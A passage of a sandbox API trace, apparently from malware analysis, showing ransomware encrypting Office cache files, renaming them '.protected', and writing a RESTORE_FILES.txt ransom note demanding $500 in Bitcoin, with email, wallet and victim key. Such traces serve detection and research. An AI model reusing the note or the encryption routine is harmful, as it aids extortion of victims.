Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 79 [0057.685] StrStrW (lpFirst="VisioMUI.msi", lpSrch=".zip") returned 0x0 [0057.685] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0057.973] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.973] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0057.973] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0057.973] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0057.977] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0057.977] CloseHandle (hObject=0xb4) returned 1 [0057.978] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.protected") returned 89 [0057.978] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.protected")) returned 1 [0057.978] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0057.978] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="Windows") returned -1 [0057.978] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="Program Files") returned 1 [0057.978] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="Program Files (x86)") returned 1 [0057.978] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="$Recycle.bin") returned 1 [0057.978] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="System Volume Information") returned 1 [0057.978] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 79 [0057.979] StrStrIW (lpFirst="VisioMUI.xml", lpSrch=".protected") returned 0x0 [0057.979] lstrcmpW (lpString1="VisioMUI.xml", lpString2="RESTORE_FILES.txt") returned 1 [0057.979] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0057.979] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0057.979] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0057.979] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 79 [0057.979] StrStrW (lpFirst="VisioMUI.xml", lpSrch=".txt") returned 0x0 [0057.979] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 79 [0057.979] StrStrW (lpFirst="VisioMUI.xml", lpSrch=".rar") returned 0x0 [0057.979] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 79 [0057.979] StrStrW (lpFirst="VisioMUI.xml", lpSrch=".zip") returned 0x0 [0057.979] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x251f, lpOverlapped=0x0) returned 1 [0057.981] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffdae1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.981] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x251f, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x251f, lpOverlapped=0x0) returned 1 [0057.981] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0057.981] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0057.981] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0057.981] CloseHandle (hObject=0xb4) returned 1 [0057.981] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.protected") returned 89 [0057.982] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.protected")) returned 1 [0057.982] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0057.982] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0057.982] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0057.982] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0057.985] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0057.985] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0057.985] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0057.985] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0057.986] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0057.986] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0057.986] CloseHandle (hObject=0xa4) returned 1 [0057.986] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0057.986] lstrcmpiW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0057.986] lstrcmpiW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0057.986] lstrcmpiW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0057.986] lstrcmpiW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0057.986] lstrcmpiW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0057.986] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C") returned 66 [0057.986] lstrcmpW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0057.986] lstrcmpW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0057.986] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*") returned 68 [0057.986] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0057.998] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0057.998] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0057.998] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0057.998] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0057.998] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0057.998] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\.") returned 68 [0057.998] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.998] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0057.998] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0057.998] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0057.998] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0057.998] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0057.998] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0057.998] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0057.998] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0057.998] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0057.998] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0057.999] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0057.999] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\..") returned 69 [0057.999] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0057.999] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.999] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0057.999] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0057.999] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0057.999] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0057.999] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0057.999] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0057.999] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="Windows") returned -1 [0057.999] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="Program Files") returned -1 [0057.999] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="Program Files (x86)") returned -1 [0057.999] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="$Recycle.bin") returned 1 [0057.999] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="System Volume Information") returned -1 [0057.999] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 81 [0057.999] StrStrIW (lpFirst="OneNoteMUI.msi", lpSrch=".protected") returned 0x0 [0057.999] lstrcmpW (lpString1="OneNoteMUI.msi", lpString2="RESTORE_FILES.txt") returned -1 [0057.999] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0057.999] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0057.999] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.000] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 81 [0058.000] StrStrW (lpFirst="OneNoteMUI.msi", lpSrch=".txt") returned 0x0 [0058.000] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 81 [0058.000] StrStrW (lpFirst="OneNoteMUI.msi", lpSrch=".rar") returned 0x0 [0058.000] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 81 [0058.000] StrStrW (lpFirst="OneNoteMUI.msi", lpSrch=".zip") returned 0x0 [0058.000] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.020] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.020] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.020] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.020] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.041] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.042] CloseHandle (hObject=0xb4) returned 1 [0058.042] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.protected") returned 91 [0058.042] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.protected")) returned 1 [0058.043] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.043] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="Windows") returned -1 [0058.043] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="Program Files") returned -1 [0058.043] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="Program Files (x86)") returned -1 [0058.043] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="$Recycle.bin") returned 1 [0058.043] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="System Volume Information") returned -1 [0058.043] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 81 [0058.043] StrStrIW (lpFirst="OneNoteMUI.xml", lpSrch=".protected") returned 0x0 [0058.043] lstrcmpW (lpString1="OneNoteMUI.xml", lpString2="RESTORE_FILES.txt") returned -1 [0058.043] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.043] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.043] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.043] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 81 [0058.043] StrStrW (lpFirst="OneNoteMUI.xml", lpSrch=".txt") returned 0x0 [0058.043] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 81 [0058.043] StrStrW (lpFirst="OneNoteMUI.xml", lpSrch=".rar") returned 0x0 [0058.043] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 81 [0058.043] StrStrW (lpFirst="OneNoteMUI.xml", lpSrch=".zip") returned 0x0 [0058.043] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x646, lpOverlapped=0x0) returned 1 [0058.054] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff9ba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.054] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x646, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x646, lpOverlapped=0x0) returned 1 [0058.054] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.054] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.054] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.054] CloseHandle (hObject=0xb4) returned 1 [0058.054] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.protected") returned 91 [0058.054] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.protected")) returned 1 [0058.055] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.055] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="Windows") returned -1 [0058.055] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="Program Files") returned -1 [0058.055] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="Program Files (x86)") returned -1 [0058.055] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="$Recycle.bin") returned 1 [0058.055] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="System Volume Information") returned -1 [0058.055] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 78 [0058.055] StrStrIW (lpFirst="OnoteLR.cab", lpSrch=".protected") returned 0x0 [0058.055] lstrcmpW (lpString1="OnoteLR.cab", lpString2="RESTORE_FILES.txt") returned -1 [0058.055] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.055] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.055] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.056] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 78 [0058.056] StrStrW (lpFirst="OnoteLR.cab", lpSrch=".txt") returned 